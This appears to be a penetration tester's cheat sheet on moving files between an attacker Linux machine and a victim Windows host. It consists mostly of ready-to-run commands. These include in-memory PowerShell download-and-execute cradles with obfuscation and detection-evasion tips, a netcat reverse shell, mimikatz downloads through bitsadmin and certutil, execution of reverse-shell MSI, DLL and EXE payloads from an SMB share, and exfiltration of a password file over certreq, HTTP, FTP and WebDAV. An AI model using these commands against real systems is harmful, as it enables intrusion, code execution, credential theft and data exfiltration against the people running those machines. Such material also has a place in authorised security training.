Resources
- Core Concepts & Analysis
- URL , URI and URN : https://auth0.com/blog/url-uri-urn-differences/
- What is @echo off : https://stackoverflow.com/questions/38307449/difference-between-echo-off-and-echo-off
- Exploitation
- By ropnop : https://blog.ropnop.com/transferring-files-from-kali-to-windows/
- By hackingarticles : https://www.hackingarticles.in/file-transfer-filter-bypass-exe2hex/ || https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/
- By t3h0n : https://t3h0n.com/transferring-a-binary-nc-exe-over-a-remote-shell-with-exe2hex-and-powershell/
- By dmcxblue : https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/
- By juggernaut-sec : https://juggernaut-sec.com/windows-file-transfers-for-hackers/
- Examples
- Astaroth : https://www.microsoft.com/en-us/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/
- By mosse-security : https://www.mosse-security.com/2020/09/29/upx-malware-evasion-technique.html
- By samuraisecurity : https://samuraisecurity.co.uk/resources/news/red-teaming-exfiltrating-data-command-network-nodes-like-a-ghost/
- By reliaquest : https://reliaquest.com/blog/exfiltration-tools/
- Detection & Analycis :
Cheat sheet
- By verylazytech : https://www.verylazytech.com/post-exploitation/file-transfer-cheatsheet-windows-and-linux
- By 1N3 : https://github.com/1N3/PowerExfil/tree/master
- By ice-wzl : https://ice-wzl.medium.com/red-team-file-transfers-all-the-ways-4274441c62f8
- By harmjoy : https://gist.github.com/HarmJ0y/bb48307ffa663256e239#file-downloadcradles-ps1-L6
- By VirtualAlllocEx : https://github.com/VirtualAlllocEx/Payload-Download-Cradles
Download From Linux 2 Windows
- Base64
# Attacker md5sum pass.txt cat pass.txt |base64 -w 0;echo OR base64 file.txt | xclip -selection clipboard # Victum [IO.File]::WriteAllBytes("C:\Users\fady\Desktop\new\pass.txt", [Convert]::FromBase64String("MTIzCjMyMQoxMjMxMjMKMTIzMTIzMTIzCg==")) Get-FileHash C:\Users\fady\Desktop\new\pass.txt -Algorithm md5 $b64 = Get-Clipboard # you already copy the base64 [IO.File]::WriteAllBytes('C:\path\to\binary.exe',[Convert]::FromBase64String($b64)) # Tips & Tricks python3 Base64_Filetransfer.py -i nc64.exe -o nc64.exe # My script to transfer Huge filesWhile this method is convenient, it's not always possible to use. Windows Command Line utility (cmd.exe) has a maximum string length of 8,191 characters. Also, a web shell may error if you attempt to send extremely large strings.
- Packing & Unpacking
# Attacker upx -9 nc.exe exe2hex -cc -x nc.exe -p nc.cmd # Powershell output exe2hex -cc -x nc.exe -b nc.cmd # Bat output exe2hex -cc -x nc.exe -e nc.cmd # Url encoded # Victum # Powershell way @echo off nc.cmd nc.exe 192.168.99.22 8080 -e cmd # Bat way (Must Found Debug.exe [C:\Windows\System32\debug.exe] you need to add DEBUG.exe’s path in environment variables.) setx DEBUG "C:\Windows\System32\debug.exe" # Optional nc.cmd nc.exe 192.168.99.22 8080 -e cmd - Powershell
- Disk
- Net.WebClient (Legacy)
# Attacker python3 -m http.server 80 # Victum (New-Object Net.WebClient).DownloadFile('http://192.168.99.22/pass.txt','C:\Users\Public\Downloads\pass.txt') OR (New-Object Net.WebClient).DownloadFileAsync('http://192.168.99.22/pass.txt', 'C:\Users\Public\Downloads\Pass.txt') # Tips & Tricks # In memory IEX (New-Object Net.WebClient).DownloadString('https://example.lab/benign.ps1') # In memory # TLS problem [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}binaries (.exe/.dll) cannot be natively “run in memory” with WebClient + IEX.
- HttpClient (Modern)
# Attacker python3 -m http.server 80 # Victum Add-Type -AssemblyName System.Net.Http $httpClient = New-Object System.Net.Http.HttpClient $bytes = $httpClient.GetByteArrayAsync("http://192.168.99.22/pass.txt").GetAwaiter().GetResult() [System.IO.File]::WriteAllBytes("C:\Users\Public\Downloads\pass.txt", $bytes) $httpClient.Dispose() # Tips & Tricks # One liner $httpClient = New-Object System.Net.Http.HttpClient; $bytes = $httpClient.GetByteArrayAsync('http://192.168.99.22/pass.txt').Result; [System.IO.File]::WriteAllBytes('C:\Users\Public\Downloads\pass.txt', $bytes); $httpClient.Dispose() # In memory Add-Type -AssemblyName System.Net.Http $hc = [Net.Http.HttpClient]::new() $src = $hc.GetStringAsync('http://192.168.99.22/winPEAS.ps1').Result IEX $src $hc.Dispose() $hc = [Net.Http.HttpClient]::new(); $src = $hc.GetStringAsync('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1').Result; IEX $src; $hc.Dispose() - Invoke-WebRequest
# Attacker python3 -m http.server 80 # Victum iwr http://192.168.99.22/pass.txt -OutFile pass.txt # Tips & Tricks # Step By step to evade detection $url = 'http://192.168.99.22/winPEAS.ps1'; $req = [System.Net.WebRequest]::Create($url); $res = $req.GetResponse(); $stream = $res.GetResponseStream(); $reader = New-Object System.IO.StreamReader($stream); $code = $reader.ReadToEnd(); iex $code; # In memroy iex ([System.Text.Encoding]::UTF8.GetString((Invoke-WebRequest -Uri 'http://192.168.99.22/winPEAS.ps1' -UseBasicParsing).Content)) IEX (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1' -UseBasicParsing).Content - Invoke-RestMethod
# Attacker python3 -m http.server 80 # Victum Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1' -OutFile "C:\Users\Public\Downloads\winPEAS.ps1" # Tips & Tricks # In memory IEX (irm -Uri 'https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1') - Net.WebClient (Legacy)
- Fileless
- Invoke-Expression
(New-Object Net.WebClient).DownloadString('http://192.168.99.22/winPEAS.ps1') | IEX IEX (New-Object Net.WebClient).DownloadString('http://192.168.99.22/winPEAS.ps1')- COM objects
- Internet Explorer (IE)
# Attacker python3 -m http.server 80 # Victum $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.99.22/winPEAS.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r # Tips & Tricks Don't use it in Updated versions - XMLHTTP
# Attacker python3 -m http.server 80 # Victum $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.99.22/winPEAS.ps1',$false);$h.send();iex $h.responseText # Tips & Tricks # Exe $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.99.22/Hello.exe',$false);$h.send();$data=$h.responseBody;[IO.File]::WriteAllBytes("$env:TEMP\s.exe",$data) - WinHttp
# Attacker python3 -m http.server 80 # Victum $h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://192.168.99.22/winPEAS.ps1',$false);$h.send();iex $h.responseText # Tips & Trciks # Obfescation $a='WinHttp.WinHttpRequest.5.1';$b='open';$c='send';$d='responseText';$h=new-object -com $a;$h.$b('GET','http://192.168.99.22/winPEAS.ps1',$false);$h.$c();iex $h.$d - XmlDocument
# Payload (Test.xml) cat test.xml <?xml version="1.0" encoding="utf-8"?> <command> <a> <execute> IEX (New-Object Net.WebClient).DownloadString('http://192.168.99.22/winPEAS.ps1')) </execute> </a> </command> # Attacker python3 -m http.server 80 # Victum $a = New-Object System.Xml.XmlDocument $a.Load("http://192.168.99.22/test.xml") $a.command.a.execute | iex
- Internet Explorer (IE)
- PowerShell Session File Transfer
- Winrm
Test-NetConnection -ComputerName DATABASE01 -Port 5985 $Session = New-PSSession -ComputerName DATABASE01 # Administrative Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\ # From Attacker 2 Victum Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session # From Victum 2 Attacker
- Winrm
- Disk
- SMB Server
# Attacker impacket-smbserver shareme ../Tools/exe -comment 'Fake Share' -smb2support impacket-smbserver shareme ./ -comment 'Fake Share' -smb2support -username test -password test New-SmbShare -Name tools -Path "C:\Users\fady\tmp" -FullAccess "Everyone" New-SmbShare -Name tools -Path "C:\Users\fady\tmp" -FullAccess "Everyone" # Victum net use Z: \\192.168.99.22\shareme net use Z: \\192.168.99.22\shareme /user:test "test" Start-BitsTransfer robocopy "\\192.168.99.22\shareme" "C:\tmp" /E /Z /R:2 /W:5 /mt:16 # The fastest Start-BitsTransfer -Source \\192.168.99.22\shareme\Tabby.exe copy \\192.168.99.22\shareme\Tabby.exe # Tips & Tricks # Unmount net use Z: /delete /y # Msi msiexec /i "\\192.168.99.22\shareme\rev.msi" /qn # Dll regsvr32 /s "\\192.168.99.22\shareme\rev.dll" # ps1 type "\\192.168.99.22\shareme\test.ps1" | iex IEX (Get-Content "\\192.168.99.22\shareme\test.ps1" -Raw) $src = [IO.File]::ReadAllText('\\192.168.99.22\shareme\test.ps1') iex $src . \\192.168.99.22\shareme\PowerView.ps1 Invoke-Command -ScriptBlock { IEX (Get-Content \\192.168.99.22\shareme\test.ps1 -Raw) } # Exe Start-Process "\\192.168.99.22\shareme\rev.exe" # Need UAC bypass - FTP
# Attacker sudo pip3 install pyftpdlib python3 -m pyftpdlib --port 21 # Victum (New-Object Net.WebClient).DownloadFile('ftp://192.168.99./file.txt', 'C:\Users\Public\ftp-file.txt') # Tips & Tricks # Non interactive shell (UAC bypass) echo open 192.168.99.23 > ftpcommand.txt echo USER anonymous >> ftpcommand.txt echo binary >> ftpcommand.txt echo GET pass.txt >> ftpcommand.txt echo bye >> ftpcommand.txt ftp -v -n -s:ftpcommand.txt - RDP
rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files' xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer - LOLBins
- Upload
- Certreq
# Attacker nc -lvnp 8000 # Victum certreq.exe -Post -config http://192.168.99.22:8000 C:\Users\fady\Desktop\pass.txt
- Certreq
- Download
- bitsadmin
# Attacker python3 -m http.server 80 # Vcitum bitsadmin /transfer fakejob /priority foreground http://192.168.99.22/mimikatz.exe C:\Users\fady\Desktop\mimo.exe OR Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"- certutil
# ATTACKER python3 -m http.server 80 # Victum certutil.exe -verifyctl -split -f http://192.168.99.22/mimikatz.exe
- Upload
- Languages
- Misc
Upload From Linux 2 Windows
- Base64
# Victum [Convert]::ToBase64String((Get-Content -path "C:\Users\fady\Desktop\pass.txt" -Encoding byte)) [Convert]::ToBase64String((Get-Content -path "C:\Users\fady\Desktop\nc64.exe" -Encoding byte)) | Set-Clipboard Get-FileHash "C:\Users\fady\Desktop\pass.txt" -Algorithm MD5 | select Hash # 2 rlwrap nc -nlvp 8080 # 3 certutil -encode C:\Users\fady\Desktop\pass.txt C:\Windows\Temp\encoded.b64 type C:\Windows\Temp\encoded.b64 | Set-Clipboard # Attacker echo 'b3BlbiAx....==' | base64 -d > file.txt OR xclip -selection clipboard -o | base64 -d > nc_copy.exe md5sum file.txt # 2 IWR -Uri http://192.168.99.22:8080/msg -Method POST -Body $base64str - Powershell
- Upload Web server
# Attacker pip3 install uploadserver python3 -m uploadserver 8080 # Victum IEX(New-Object Net.WebClient).DownloadString('http://192.168.99.22/PSUpload.ps1') Invoke-FileUpload -Uri http://192.168.99.22:8080/upload -File C:\Users\fady\Desktop\pass.txt- Invoke-WebRequest
# Attacker rlwrap nc -nlvp 8080 THEN echo 'MTIzDQozMjENCjEyMzEyMw0KMTIzMTIzMTIzDQo=' | base64 -d -w 0 > pass.txt # Victum $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Users\fady\Desktop\pass.txt' -Encoding Byte)) Invoke-WebRequest -Uri http://192.168.99.22:8080/ -Method POST -Body $b64- SMB
# Attacker pip3 install wsgidav cheroot wsgidav -H 0.0.0.0 -p 80 -r /root/Trash/ --auth anonymous -v impacket-smbserver shareme . -comment 'Fake Share' -smb2support # Victum copy C:\Users\fady\Desktop\Wireshark-4.6.0-x64.exe \\192.168.99.22\DavWWWRoot\ # Tips & Trciks # The WebDAV UNC redirector depends on the WebClient service. If it’s stopped or disabled, UNC \\host\DavWWWRoot fails. Get-Service WebClient | Select-Object Status, StartType Start-Service WebClient # AdministratorCommonly enterprises don't allow the SMB protocol (TCP/445) out of their internal network because this can open them up to potential attacks An alternative is to run SMB over HTTP with
WebDav.- FTP
# Attacker python3 -m pyftpdlib --port 21 --write # Victum (New-Object Net.WebClient).UploadFile('ftp://192.168.99.22/Wireshark.exe', 'C:\Users\fady\Desktop\Wireshark-4.6.0-x64.exe') # Tips & Tricks # Non interactive shell echo open 192.168.99.22 > ftpcommand.txt echo USER anonymous >> ftpcommand.txt echo binary >> ftpcommand.txt echo PUT C:\Users\fady\Desktop\Wireshark-4.6.0-x64.exe >> ftpcommand.txt echo bye >> ftpcommand.txt ftp -v -n -s:ftpcommand.txt
Data Protection
- Invoke-AESEncryption.ps1
Invoke-AESEncryption -Mode Encrypt -Key Password123# -Path .\pass.txt -Verbose Invoke-AESEncryption -Mode Decrypt -Key Password123# -Path C:\Users\fady\Desktop\pass.txt.aes
Tools
- Gists : mgeeky | Harmj0y
- PSUpload.ps1 : PSUpload.ps1
- Invoke-AESEncryption : https://www.powershellgallery.com/packages/DRTools/4.0.2.3/Content/Functions%5CInvoke-AESEncryption.ps1
- LOLBAS : https://lolbas-project.github.io/
- exe2hex : https://github.com/g0tmi1k/exe2hex
- Invoke-CradelCrafter : https://github.com/danielbohannon/Invoke-CradleCrafter
Notes
URI vs. URL vs. URN
Term Identifies? Locates? Example URI Yes Maybe https://example.comorurn:isbn:1234URL Yes Yes https://example.com/page.htmlURN Yes No urn:isbn:0-486-27557-4
PowerShell Web Transfer Tools: A Comparison
Quick Comparison (At a Glance)
Feature Net.WebClient HttpClient Invoke-WebRequest (iwr) Invoke-RestMethod (irm) Primary use Simple HTTP, legacy-friendly Modern, robust HTTP Human/content fetch (HTML/files) APIs/REST (JSON/XML → objects) Return type String/bytes (you decide) HttpResponseMessage / bytes / string HtmlWebResponseObject (has .Content) Native PS objects (JSON→PSObject) Speed/overhead Fast & terse Fastest + scalable Slowest on WinPS 3–5.x (extra parsing) Fast for APIs (no HTML parsing) File download DownloadFile/ bytesStream/bytes → write-OutFile-OutFile(best with files)Not ideal; use iwrFileless exec `.DownloadString() IEX` `GetStringAsync() IEX` Proxy awareness Inherits system; settable Full control via handler Proxy-aware; -ProxyProxy-aware; -ProxyTLS control Often via global ServicePointManagerPer-handler (clean) Engine defaults Engine defaults Headers/UA $wc.Headers[...]DefaultRequestHeaders-Headers,-UserAgent-Headers,-UserAgentLogging optics Low cmdlet “signature” Low (looks like .NET use) High (easy to detect iwr)Medium (common in admin/API use) Cross-platform Yes (Windows .NET) Yes Yes (PS 3+) Yes (PS 3+)
When to use what (Decision Cheat Sheet)
- Download a file reliably (to disk) →
iwr -OutFile(simple) orHttpClient(fine control).- In-memory/fileless text →
WebClient(short) orHttpClient(stealthier cmdline);iwrworks via.Content.- Consume an API (JSON/XML) →
irm(auto-parses to objects).- Terse one-liner on legacy hosts →
WebClient.- Need precise proxy/TLS/timeout control →
HttpClient.- Large/brittle transfers → Consider BITS (
Start-BitsTransfer) for resiliency (disk-touching by design).